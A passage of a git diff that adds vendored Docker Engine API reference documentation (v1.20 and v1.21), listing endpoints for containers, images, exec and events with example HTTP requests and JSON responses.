text/plain + + OK + +**Status codes**: + +- **200** - no error +- **500** - server error + +#### Create a new image from a container's changes + +`POST /commit` + +Create a new image from a container's changes + +**Example request**: + + POST /v1.20/commit?container=44c004db4b17&comment=message&repo=myrepo HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": null, + "Cmd": [ + "date" + ], + "Mounts": [ + { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ], + "Labels": { + "key1": 
"value1", + "key2": "value2" + }, + "WorkingDir": "", + "NetworkDisabled": false, + "ExposedPorts": { + "22/tcp": {} + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + {"Id": "596069db4bf5"} + +**JSON parameters**: + +- **config** - the container's configuration + +**Query parameters**: + +- **container** – source container +- **repo** – repository +- **tag** – tag +- **comment** – commit message +- **author** – author (e.g., "John Hannibal Smith + <[hannibal@a-team.com](mailto:hannibal%40a-team.com)>") +- **pause** – 1/True/true or 0/False/false, whether to pause the container before committing +- **changes** – Dockerfile instructions to apply while committing + +**Status codes**: + +- **201** – no error +- **404** – no such container +- **500** – server error + +#### Monitor Docker's events + +`GET /events` + +Get container events from docker, in real time via streaming. + +Docker containers report the following events: + + attach, commit, copy, create, destroy, die, exec_create, exec_start, export, kill, oom, pause, rename, resize, restart, start, stop, top, unpause + +Docker images report the following events: + + delete, import, pull, push, tag, untag + +**Example request**: + + GET /v1.20/events?since=1374067924 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + {"status": "create", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "start", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067924} + {"status": "stop", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067966} + {"status": "destroy", "id": "dfdf82bd3881","from": "ubuntu:latest", "time":1374067970} + +**Query parameters**: + +- **since** – Timestamp. Show all events created since timestamp and then stream +- **until** – Timestamp. 
Show events created until given timestamp and stop streaming +- **filters** – A json encoded value of the filters (a map[string][]string) to process on the event list. Available filters: + - `container=`; -- container to filter + - `event=`; -- event to filter + - `image=`; -- image to filter + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images in a repository + +`GET /images/(name)/get` + +Get a tarball containing all images and metadata for the repository specified +by `name`. + +If `name` is a specific name and tag (e.g. ubuntu:latest), then only that image +(and its parents) are returned. If `name` is an image ID, similarly only that +image (and its parents) are returned, but with the exclusion of the +'repositories' file in the tarball, as there were no image names referenced. + +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + GET /v1.20/images/ubuntu/get + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Get a tarball containing all images + +`GET /images/get` + +Get a tarball containing all images and metadata for one or more repositories. + +For each value of the `names` parameter: if it is a specific name and tag (e.g. +`ubuntu:latest`), then only that image (and its parents) are returned; if it is +an image ID, similarly only that image (and its parents) are returned and there +would be no names referenced in the 'repositories' file for this image ID. + +See the [image tarball format](#image-tarball-format) for more details. 
+ +**Example request** + + GET /v1.20/images/get?names=myname%2Fmyapp%3Alatest&names=busybox + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/x-tar + + Binary data stream + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Load a tarball with a set of images and tags into docker + +`POST /images/load` + +Load a set of images and tags into a Docker repository. +See the [image tarball format](#image-tarball-format) for more details. + +**Example request** + + POST /v1.20/images/load + Content-Type: application/x-tar + + Tarball in body + +**Example response**: + + HTTP/1.1 200 OK + +**Status codes**: + +- **200** – no error +- **500** – server error + +#### Image tarball format + +An image tarball contains one directory per image layer (named using its long ID), +each containing these files: + +- `VERSION`: currently `1.0` - the file format version +- `json`: detailed layer information, similar to `docker inspect layer_id` +- `layer.tar`: A tarfile containing the filesystem changes in this layer + +The `layer.tar` file contains `aufs` style `.wh..wh.aufs` files and directories +for storing attribute changes and deletions. + +If the tarball defines a repository, the tarball should also include a `repositories` file at +the root that contains a list of repository and tag names mapped to layer IDs. 
+ +``` +{"hello-world": + {"latest": "565a9d68a73f6706862bfe8409a7f659776d4d60a8d096eb4a3cbce6999cc2a1"} +} +``` + +#### Exec Create + +`POST /containers/(id or name)/exec` + +Sets up an exec instance in a running container `id` + +**Example request**: + + POST /v1.20/containers/e90e34656806/exec HTTP/1.1 + Content-Type: application/json + + { + "AttachStdin": true, + "AttachStdout": true, + "AttachStderr": true, + "Cmd": ["sh"], + "Tty": true, + "User": "123:456" + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id": "f90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **AttachStdin** - Boolean value, attaches to `stdin` of the `exec` command. +- **AttachStdout** - Boolean value, attaches to `stdout` of the `exec` command. +- **AttachStderr** - Boolean value, attaches to `stderr` of the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. +- **Cmd** - Command to run specified as a string or an array of strings. +- **User** - A string value specifying the user, and optionally, group to run + the exec process inside the container. Format is one of: `"user"`, + `"user:group"`, `"uid"`, or `"uid:gid"`. + +**Status codes**: + +- **201** – no error +- **404** – no such container + +#### Exec Start + +`POST /exec/(id)/start` + +Starts a previously set up `exec` instance `id`. If `detach` is true, this API +returns after starting the `exec` command. Otherwise, this API sets up an +interactive session with the `exec` command. + +**Example request**: + + POST /v1.20/exec/e90e34656806/start HTTP/1.1 + Content-Type: application/json + + { + "Detach": false, + "Tty": false + } + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/vnd.docker.raw-stream + + {% raw %} + {{ STREAM }} + {% endraw %} + +**JSON parameters**: + +- **Detach** - Detach from the `exec` command. +- **Tty** - Boolean value to allocate a pseudo-TTY. 
+
+**Status codes**:
+
+- **200** – no error
+- **404** – no such exec instance
+
+**Stream details**:
+
+Similar to the stream behavior of `POST /containers/(id or name)/attach` API
+
+#### Exec Resize
+
+`POST /exec/(id)/resize`
+
+Resizes the `tty` session used by the `exec` command `id`. The unit is number of characters.
+This API is valid only if `tty` was specified as part of creating and starting the `exec` command.
+
+**Example request**:
+
+    POST /v1.20/exec/e90e34656806/resize?h=40&w=80 HTTP/1.1
+    Content-Type: text/plain
+
+**Example response**:
+
+    HTTP/1.1 201 Created
+    Content-Type: text/plain
+
+**Query parameters**:
+
+- **h** – height of `tty` session
+- **w** – width
+
+**Status codes**:
+
+- **201** – no error
+- **404** – no such exec instance
+
+#### Exec Inspect
+
+`GET /exec/(id)/json`
+
+Return low-level information about the `exec` command `id`.
+
+**Example request**:
+
+    GET /v1.20/exec/11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39/json HTTP/1.1
+
+**Example response**:
+
+    HTTP/1.1 200 OK
+    Content-Type: text/plain
+
+    {
+      "ID" : "11fb006128e8ceb3942e7c58d77750f24210e35f879dd204ac975c184b820b39",
+      "Running" : false,
+      "ExitCode" : 2,
+      "ProcessConfig" : {
+        "privileged" : false,
+        "user" : "",
+        "tty" : false,
+        "entrypoint" : "sh",
+        "arguments" : [
+          "-c",
+          "exit 2"
+        ]
+      },
+      "OpenStdin" : false,
+      "OpenStderr" : false,
+      "OpenStdout" : false,
+      "Container" : {
+        "State" : {
+          "Running" : true,
+          "Paused" : false,
+          "Restarting" : false,
+          "OOMKilled" : false,
+          "Pid" : 3650,
+          "ExitCode" : 0,
+          "Error" : "",
+          "StartedAt" : "2014-11-17T22:26:03.717657531Z",
+          "FinishedAt" : "0001-01-01T00:00:00Z"
+        },
+        "ID" : "8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c",
+        "Created" : "2014-11-17T22:26:03.626304998Z",
+        "Path" : "date",
+        "Args" : [],
+        "Config" : {
+          "Hostname" : "8f177a186b97",
+          "Domainname" : "",
+          "User" : "",
+          "AttachStdin" : false,
+          "AttachStdout" : false,
+          "AttachStderr" : false,
+ "ExposedPorts" : null, + "Tty" : false, + "OpenStdin" : false, + "StdinOnce" : false, + "Env" : [ "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" ], + "Cmd" : [ + "date" + ], + "Image" : "ubuntu", + "Volumes" : null, + "WorkingDir" : "", + "Entrypoint" : null, + "NetworkDisabled" : false, + "MacAddress" : "", + "OnBuild" : null, + "SecurityOpt" : null + }, + "Image" : "5506de2b643be1e6febbf3b8a240760c6843244c41e12aa2f60ccbb7153d17f5", + "NetworkSettings" : { + "IPAddress" : "172.17.0.2", + "IPPrefixLen" : 16, + "MacAddress" : "02:42:ac:11:00:02", + "Gateway" : "172.17.42.1", + "Bridge" : "docker0", + "PortMapping" : null, + "Ports" : {} + }, + "ResolvConfPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/resolv.conf", + "HostnamePath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hostname", + "HostsPath" : "/var/lib/docker/containers/8f177a186b977fb451136e0fdf182abff5599a08b3c7f6ef0d36a55aaf89634c/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Name" : "/test", + "Driver" : "aufs", + "ExecDriver" : "native-0.2", + "MountLabel" : "", + "ProcessLabel" : "", + "AppArmorProfile" : "", + "RestartCount" : 0, + "Mounts" : [] + } + } + +**Status codes**: + +- **200** – no error +- **404** – no such exec instance +- **500** - server error + +## 3. Going further + +### 3.1 Inside `docker run` + +As an example, the `docker run` command line makes the following API calls: + +- Create the container + +- If the status code is 404, it means the image doesn't exist: + - Try to pull it. + - Then, retry to create the container. + +- Start the container. 
+ +- If you are not in detached mode: +- Attach to the container, using `logs=1` (to have `stdout` and + `stderr` from the container's start) and `stream=1` + +- If in detached mode or only `stdin` is attached, display the container's id. + +### 3.2 Hijacking + +In this version of the API, `/attach`, uses hijacking to transport `stdin`, +`stdout`, and `stderr` on the same socket. + +To hint potential proxies about connection hijacking, Docker client sends +connection upgrade headers similarly to websocket. + + Upgrade: tcp + Connection: Upgrade + +When Docker daemon detects the `Upgrade` header, it switches its status code +from **200 OK** to **101 UPGRADED** and resends the same headers. + + +### 3.3 CORS Requests + +To set cross origin requests to the Engine API please give values to +`--api-cors-header` when running Docker in daemon mode. Set * (asterisk) allows all, +default or blank means CORS disabled + + $ dockerd -H="192.168.1.9:2375" --api-cors-header="http://foo.bar" diff --git a/vendor/github.com/docker/docker/docs/api/v1.21.md b/vendor/github.com/docker/docker/docs/api/v1.21.md new file mode 100644 index 0000000000..b4f54b7c44 --- /dev/null +++ b/vendor/github.com/docker/docker/docs/api/v1.21.md @@ -0,0 +1,2969 @@ +--- +title: "Engine API v1.21" +description: "API Documentation for Docker" +keywords: "API, Docker, rcli, REST, documentation" +redirect_from: +- /engine/reference/api/docker_remote_api_v1.21/ +- /reference/api/docker_remote_api_v1.21/ +--- + + + +## 1. Brief introduction + + - The daemon listens on `unix:///var/run/docker.sock` but you can + [Bind Docker to another host/port or a Unix socket](../reference/commandline/dockerd.md#bind-docker-to-another-host-port-or-a-unix-socket). + - The API tends to be REST. However, for some complex commands, like `attach` + or `pull`, the HTTP connection is hijacked to transport `stdout`, + `stdin` and `stderr`. 
+ - When the client API version is newer than the daemon's, these calls return an HTTP + `400 Bad Request` error message. + +## 2. Endpoints + +### 2.1 Containers + +#### List containers + +`GET /containers/json` + +List containers + +**Example request**: + + GET /v1.21/containers/json?all=1&before=8dfafdbc3a40&size=1 HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Id": "8dfafdbc3a40", + "Names":["/boring_feynman"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 1", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [{"PrivatePort": 2222, "PublicPort": 3333, "Type": "tcp"}], + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "9cd87474be90", + "Names":["/coolName"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 222222", + "Created": 1367854155, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + }, + { + "Id": "3176a2479c92", + "Names":["/sleepy_dog"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 3333333333333333", + "Created": 1367854154, + "Status": "Exit 0", + "Ports":[], + "Labels": {}, + "SizeRw":12288, + "SizeRootFs":0 + }, + { + "Id": "4cb07b47f9fb", + "Names":["/running_cat"], + "Image": "ubuntu:latest", + "ImageID": "d74508fb6632491cea586a1fd7d748dfc5274cd6fdfedee309ecdcbc2bf5cb82", + "Command": "echo 444444444444444444444444444444444", + "Created": 1367854152, + "Status": "Exit 0", + "Ports": [], + "Labels": {}, + "SizeRw": 12288, + "SizeRootFs": 0 + } + ] + +**Query parameters**: + +- **all** – 1/True/true or 0/False/false, Show all containers. 
+ Only running containers are shown by default (i.e., this defaults to false) +- **limit** – Show `limit` last created + containers, include non-running ones. +- **since** – Show only containers created since Id, include + non-running ones. +- **before** – Show only containers created before Id, include + non-running ones. +- **size** – 1/True/true or 0/False/false, Show the containers + sizes +- **filters** - a JSON encoded value of the filters (a `map[string][]string`) to process on the containers list. Available filters: + - `exited=`; -- containers with exit code of `` ; + - `status=`(`created`|`restarting`|`running`|`paused`|`exited`) + - `label=key` or `label="key=value"` of a container label + +**Status codes**: + +- **200** – no error +- **400** – bad parameter +- **500** – server error + +#### Create a container + +`POST /containers/create` + +Create a container + +**Example request**: + + POST /v1.21/containers/create HTTP/1.1 + Content-Type: application/json + + { + "Hostname": "", + "Domainname": "", + "User": "", + "AttachStdin": false, + "AttachStdout": true, + "AttachStderr": true, + "Tty": false, + "OpenStdin": false, + "StdinOnce": false, + "Env": [ + "FOO=bar", + "BAZ=quux" + ], + "Cmd": [ + "date" + ], + "Entrypoint": null, + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "Volumes": { + "/volumes/data": {} + }, + "WorkingDir": "", + "NetworkDisabled": false, + "MacAddress": "12:34:56:78:9a:bc", + "ExposedPorts": { + "22/tcp": {} + }, + "StopSignal": "SIGTERM", + "HostConfig": { + "Binds": ["/tmp:/tmp"], + "Links": ["redis3:redis"], + "LxcConf": {"lxc.utsname":"docker"}, + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "CpuShares": 512, + "CpuPeriod": 100000, + "CpuQuota": 50000, + "CpusetCpus": "0,1", + "CpusetMems": "0,1", + "BlkioWeight": 300, + "MemorySwappiness": 60, + "OomKillDisable": false, + "PidMode": "", + 
"PortBindings": { "22/tcp": [{ "HostPort": "11022" }] }, + "PublishAllPorts": false, + "Privileged": false, + "ReadonlyRootfs": false, + "Dns": ["8.8.8.8"], + "DnsOptions": [""], + "DnsSearch": [""], + "ExtraHosts": null, + "VolumesFrom": ["parent", "other:ro"], + "CapAdd": ["NET_ADMIN"], + "CapDrop": ["MKNOD"], + "GroupAdd": ["newgroup"], + "RestartPolicy": { "Name": "", "MaximumRetryCount": 0 }, + "NetworkMode": "bridge", + "Devices": [], + "Ulimits": [{}], + "LogConfig": { "Type": "json-file", "Config": {} }, + "SecurityOpt": [], + "CgroupParent": "", + "VolumeDriver": "" + } + } + +**Example response**: + + HTTP/1.1 201 Created + Content-Type: application/json + + { + "Id":"e90e34656806", + "Warnings":[] + } + +**JSON parameters**: + +- **Hostname** - A string value containing the hostname to use for the + container. +- **Domainname** - A string value containing the domain name to use + for the container. +- **User** - A string value specifying the user inside the container. +- **AttachStdin** - Boolean value, attaches to `stdin`. +- **AttachStdout** - Boolean value, attaches to `stdout`. +- **AttachStderr** - Boolean value, attaches to `stderr`. +- **Tty** - Boolean value, Attach standard streams to a `tty`, including `stdin` if it is not closed. +- **OpenStdin** - Boolean value, opens `stdin`, +- **StdinOnce** - Boolean value, close `stdin` after the 1 attached client disconnects. +- **Env** - A list of environment variables in the form of `["VAR=value", ...]` +- **Labels** - Adds a map of labels to a container. To specify a map: `{"key":"value", ... }` +- **Cmd** - Command to run specified as a string or an array of strings. +- **Entrypoint** - Set the entry point for the container as a string or an array + of strings. +- **Image** - A string specifying the image name to use for the container. +- **Volumes** - An object mapping mount point paths (strings) inside the + container to empty objects. 
+- **WorkingDir** - A string specifying the working directory for commands to + run in. +- **NetworkDisabled** - Boolean value, when true disables networking for the + container +- **ExposedPorts** - An object mapping ports to an empty object in the form of: + `"ExposedPorts": { "/: {}" }` +- **StopSignal** - Signal to stop a container as a string or unsigned integer. `SIGTERM` by default. +- **HostConfig** + - **Binds** – A list of volume bindings for this container. Each volume binding is a string in one of these forms: + + `host-src:container-dest` to bind-mount a host path into the + container. Both `host-src`, and `container-dest` must be an + _absolute_ path. + + `host-src:container-dest:ro` to make the bind-mount read-only + inside the container. Both `host-src`, and `container-dest` must be + an _absolute_ path. + + `volume-name:container-dest` to bind-mount a volume managed by a + volume driver into the container. `container-dest` must be an + _absolute_ path. + + `volume-name:container-dest:ro` to mount the volume read-only + inside the container. `container-dest` must be an _absolute_ path. + - **Links** - A list of links for the container. Each link entry should be + in the form of `container_name:alias`. + - **LxcConf** - LXC specific configurations. These configurations only + work when using the `lxc` execution driver. + - **Memory** - Memory limit in bytes. + - **MemorySwap** - Total memory limit (memory + swap); set `-1` to enable unlimited swap. + You must use this with `memory` and make the swap value larger than `memory`. + - **MemoryReservation** - Memory soft limit in bytes. + - **KernelMemory** - Kernel memory limit in bytes. + - **CpuShares** - An integer value containing the container's CPU Shares + (ie. the relative weight vs other containers). + - **CpuPeriod** - The length of a CPU period in microseconds. + - **CpuQuota** - Microseconds of CPU time that the container can get in a CPU period. 
+ - **CpusetCpus** - String value containing the `cgroups CpusetCpus` to use. + - **CpusetMems** - Memory nodes (MEMs) in which to allow execution (0-3, 0,1). Only effective on NUMA systems. + - **BlkioWeight** - Block IO weight (relative weight) accepts a weight value between 10 and 1000. + - **MemorySwappiness** - Tune a container's memory swappiness behavior. Accepts an integer between 0 and 100. + - **OomKillDisable** - Boolean value, whether to disable OOM Killer for the container or not. + - **PidMode** - Set the PID (Process) Namespace mode for the container; + `"container:"`: joins another container's PID namespace + `"host"`: use the host's PID namespace inside the container + - **PortBindings** - A map of exposed container ports and the host port they + should map to. A JSON object in the form + `{ /: [{ "HostPort": "" }] }` + Take note that `port` is specified as a string and not an integer value. + - **PublishAllPorts** - Allocates a random host port for all of a container's + exposed ports. Specified as a boolean value. + - **Privileged** - Gives the container full access to the host. Specified as + a boolean value. + - **ReadonlyRootfs** - Mount the container's root filesystem as read only. + Specified as a boolean value. + - **Dns** - A list of DNS servers for the container to use. + - **DnsOptions** - A list of DNS options + - **DnsSearch** - A list of DNS search domains + - **ExtraHosts** - A list of hostnames/IP mappings to add to the + container's `/etc/hosts` file. Specified in the form `["hostname:IP"]`. + - **VolumesFrom** - A list of volumes to inherit from another container. + Specified in the form `[:]` + - **CapAdd** - A list of kernel capabilities to add to the container. + - **Capdrop** - A list of kernel capabilities to drop from the container. + - **GroupAdd** - A list of additional groups that the container process will run as + - **RestartPolicy** – The behavior to apply when the container exits. 
The + value is an object with a `Name` property of either `"always"` to + always restart, `"unless-stopped"` to restart always except when + user has manually stopped the container or `"on-failure"` to restart only when the container + exit code is non-zero. If `on-failure` is used, `MaximumRetryCount` + controls the number of times to retry before giving up. + The default is not to restart. (optional) + An ever increasing delay (double the previous delay, starting at 100mS) + is added before each restart to prevent flooding the server. + - **NetworkMode** - Sets the networking mode for the container. Supported + standard values are: `bridge`, `host`, `none`, and `container:`. Any other value is taken + as a custom network's name to which this container should connect to. + - **Devices** - A list of devices to add to the container specified as a JSON object in the + form + `{ "PathOnHost": "/dev/deviceName", "PathInContainer": "/dev/deviceName", "CgroupPermissions": "mrw"}` + - **Ulimits** - A list of ulimits to set in the container, specified as + `{ "Name": , "Soft": , "Hard": }`, for example: + `Ulimits: { "Name": "nofile", "Soft": 1024, "Hard": 2048 }` + - **SecurityOpt**: A list of string values to customize labels for MLS + systems, such as SELinux. + - **LogConfig** - Log configuration for the container, specified as a JSON object in the form + `{ "Type": "", "Config": {"key1": "val1"}}`. + Available types: `json-file`, `syslog`, `journald`, `gelf`, `awslogs`, `none`. + `json-file` logging driver. + - **CgroupParent** - Path to `cgroups` under which the container's `cgroup` is created. If the path is not absolute, the path is considered to be relative to the `cgroups` path of the init process. Cgroups are created if they do not already exist. + - **VolumeDriver** - Driver that this container users to mount volumes. + +**Query parameters**: + +- **name** – Assign the specified name to the container. Must + match `/?[a-zA-Z0-9_-]+`. 
+ +**Status codes**: + +- **201** – no error +- **400** – bad parameter +- **404** – no such container +- **406** – impossible to attach (container not running) +- **409** – conflict +- **500** – server error + +#### Inspect a container + +`GET /containers/(id or name)/json` + +Return low-level information on the container `id` + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/json HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "AppArmorProfile": "", + "Args": [ + "-c", + "exit 9" + ], + "Config": { + "AttachStderr": true, + "AttachStdin": false, + "AttachStdout": true, + "Cmd": [ + "/bin/sh", + "-c", + "exit 9" + ], + "Domainname": "", + "Entrypoint": null, + "Env": [ + "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin" + ], + "ExposedPorts": null, + "Hostname": "ba033ac44011", + "Image": "ubuntu", + "Labels": { + "com.example.vendor": "Acme", + "com.example.license": "GPL", + "com.example.version": "1.0" + }, + "MacAddress": "", + "NetworkDisabled": false, + "OnBuild": null, + "OpenStdin": false, + "StdinOnce": false, + "Tty": false, + "User": "", + "Volumes": null, + "WorkingDir": "", + "StopSignal": "SIGTERM" + }, + "Created": "2015-01-06T15:47:31.485331387Z", + "Driver": "devicemapper", + "ExecDriver": "native-0.2", + "ExecIDs": null, + "HostConfig": { + "Binds": null, + "BlkioWeight": 0, + "CapAdd": null, + "CapDrop": null, + "ContainerIDFile": "", + "CpusetCpus": "", + "CpusetMems": "", + "CpuShares": 0, + "CpuPeriod": 100000, + "Devices": [], + "Dns": null, + "DnsOptions": null, + "DnsSearch": null, + "ExtraHosts": null, + "IpcMode": "", + "Links": null, + "LxcConf": [], + "Memory": 0, + "MemorySwap": 0, + "MemoryReservation": 0, + "KernelMemory": 0, + "OomKillDisable": false, + "NetworkMode": "bridge", + "PidMode": "", + "PortBindings": {}, + "Privileged": false, + "ReadonlyRootfs": false, + "PublishAllPorts": false, + "RestartPolicy": { + "MaximumRetryCount": 2, + "Name": 
"on-failure" + }, + "LogConfig": { + "Config": null, + "Type": "json-file" + }, + "SecurityOpt": null, + "VolumesFrom": null, + "Ulimits": [{}], + "VolumeDriver": "" + }, + "HostnamePath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hostname", + "HostsPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/hosts", + "LogPath": "/var/lib/docker/containers/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b/1eb5fabf5a03807136561b3c00adcd2992b535d624d5e18b6cdc6a6844d9767b-json.log", + "Id": "ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39", + "Image": "04c5d3b7b0656168630d3ba35d8889bd0e9caafcaeb3004d2bfbc47e7c5d35d2", + "MountLabel": "", + "Name": "/boring_euclid", + "NetworkSettings": { + "Bridge": "", + "SandboxID": "", + "HairpinMode": false, + "LinkLocalIPv6Address": "", + "LinkLocalIPv6PrefixLen": 0, + "Ports": null, + "SandboxKey": "", + "SecondaryIPAddresses": null, + "SecondaryIPv6Addresses": null, + "EndpointID": "", + "Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "IPAddress": "", + "IPPrefixLen": 0, + "IPv6Gateway": "", + "MacAddress": "", + "Networks": { + "bridge": { + "EndpointID": "7587b82f0dada3656fda26588aee72630c6fab1536d36e394b2bfbcf898c971d", + "Gateway": "172.17.0.1", + "IPAddress": "172.17.0.2", + "IPPrefixLen": 16, + "IPv6Gateway": "", + "GlobalIPv6Address": "", + "GlobalIPv6PrefixLen": 0, + "MacAddress": "02:42:ac:12:00:02" + } + } + }, + "Path": "/bin/sh", + "ProcessLabel": "", + "ResolvConfPath": "/var/lib/docker/containers/ba033ac4401106a3b513bc9d639eee123ad78ca3616b921167cd74b20e25ed39/resolv.conf", + "RestartCount": 1, + "State": { + "Error": "", + "ExitCode": 9, + "FinishedAt": "2015-01-06T15:47:32.080254511Z", + "OOMKilled": false, + "Paused": false, + "Pid": 0, + "Restarting": false, + "Running": true, + "StartedAt": "2015-01-06T15:47:32.072697474Z", + "Status": "running" + }, + "Mounts": [ 
+ { + "Source": "/data", + "Destination": "/data", + "Mode": "ro,Z", + "RW": false + } + ] + } + +**Example request, with size information**: + + GET /v1.21/containers/4fa6e0f0c678/json?size=1 HTTP/1.1 + +**Example response, with size information**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + .... + "SizeRw": 0, + "SizeRootFs": 972, + .... + } + +**Query parameters**: + +- **size** – 1/True/true or 0/False/false, return container size information. Default is `false`. + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### List processes running inside a container + +`GET /containers/(id or name)/top` + +List processes running inside the container `id`. On Unix systems this +is done by running the `ps` command. This endpoint is not +supported on Windows. + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/top HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "UID", "PID", "PPID", "C", "STIME", "TTY", "TIME", "CMD" + ], + "Processes" : [ + [ + "root", "13642", "882", "0", "17:03", "pts/0", "00:00:00", "/bin/bash" + ], + [ + "root", "13735", "13642", "0", "17:06", "pts/0", "00:00:00", "sleep 10" + ] + ] + } + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/top?ps_args=aux HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + { + "Titles" : [ + "USER","PID","%CPU","%MEM","VSZ","RSS","TTY","STAT","START","TIME","COMMAND" + ] + "Processes" : [ + [ + "root","13642","0.0","0.1","18172","3184","pts/0","Ss","17:03","0:00","/bin/bash" + ], + [ + "root","13895","0.0","0.0","4348","692","pts/0","S+","17:15","0:00","sleep 10" + ] + ], + } + +**Query parameters**: + +- **ps_args** – `ps` arguments to use (e.g., `aux`), defaults to `-ef` + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container logs + +`GET /containers/(id or 
name)/logs` + +Get `stdout` and `stderr` logs from the container ``id`` + +> **Note**: +> This endpoint works only for containers with the `json-file` or `journald` logging drivers. + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/logs?stderr=1&stdout=1×tamps=1&follow=1&tail=10&since=1428990821 HTTP/1.1 + +**Example response**: + + HTTP/1.1 101 UPGRADED + Content-Type: application/vnd.docker.raw-stream + Connection: Upgrade + Upgrade: tcp + + {% raw %} + {{ STREAM }} + {% endraw %} + +**Query parameters**: + +- **follow** – 1/True/true or 0/False/false, return stream. Default `false`. +- **stdout** – 1/True/true or 0/False/false, show `stdout` log. Default `false`. +- **stderr** – 1/True/true or 0/False/false, show `stderr` log. Default `false`. +- **since** – UNIX timestamp (integer) to filter logs. Specifying a timestamp + will only output log-entries since that timestamp. Default: 0 (unfiltered) +- **timestamps** – 1/True/true or 0/False/false, print timestamps for + every log line. Default `false`. +- **tail** – Output specified number of lines at the end of logs: `all` or ``. Default all. 
+ +**Status codes**: + +- **101** – no error, hints proxy about hijacking +- **200** – no error, no upgrade header found +- **404** – no such container +- **500** – server error + +#### Inspect changes on a container's filesystem + +`GET /containers/(id or name)/changes` + +Inspect changes on container `id`'s filesystem + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/changes HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/json + + [ + { + "Path": "/dev", + "Kind": 0 + }, + { + "Path": "/dev/kmsg", + "Kind": 1 + }, + { + "Path": "/test", + "Kind": 1 + } + ] + +Values for `Kind`: + +- `0`: Modify +- `1`: Add +- `2`: Delete + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Export a container + +`GET /containers/(id or name)/export` + +Export the contents of container `id` + +**Example request**: + + GET /v1.21/containers/4fa6e0f0c678/export HTTP/1.1 + +**Example response**: + + HTTP/1.1 200 OK + Content-Type: application/octet-stream + + {% raw %} + {{ TAR STREAM }} + {% endraw %} + +**Status codes**: + +- **200** – no error +- **404** – no such container +- **500** – server error + +#### Get container stats based on resource usage + +`GET /containers/(id or name)/stats` + +This endpoint returns a live stream of a container's resource usage statistics. 
